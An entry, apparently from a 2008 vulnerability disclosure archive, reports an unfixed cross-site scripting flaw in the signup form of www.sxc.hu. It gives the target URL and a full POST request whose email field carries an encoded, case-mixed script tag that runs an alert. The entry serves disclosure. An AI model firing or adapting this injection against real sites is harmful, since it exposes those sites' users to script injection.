Security researcher Uber0n submitted a cross-site scripting (XSS) vulnerability affecting www.sxc.hu on 13/02/2008. At the time of submission the site ranked 1051 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 03/04/2008. It is currently unfixed.

If you believe that this security issue has been corrected, please send us an e-mail.
| Date submitted: 13/02/2008 | Date published: 03/04/2008 | Fixed? Mail us! | Status: UNFIXED |
|---|---|---|---|
| Author: Uber0n | Domain: www.sxc.hu | Category: XSS | Pagerank: 1051 |
 
 
| URL: http://www.sxc.hu/index.phtml |  
 
| POST: login=&pass=&passc=&email=%22%3E%27%3E%3CScRiPt%3Ealert%28123%29%3C%2FsCrIpT%3E%22%27&emailc=&firstname=&lastname=&company=&phone=&street1=&street2=&street3=&city=&state=&country=&zip=&=[URL-encoded text of the site's Terms of Use omitted]&f=signup_check&x=27&y=4 |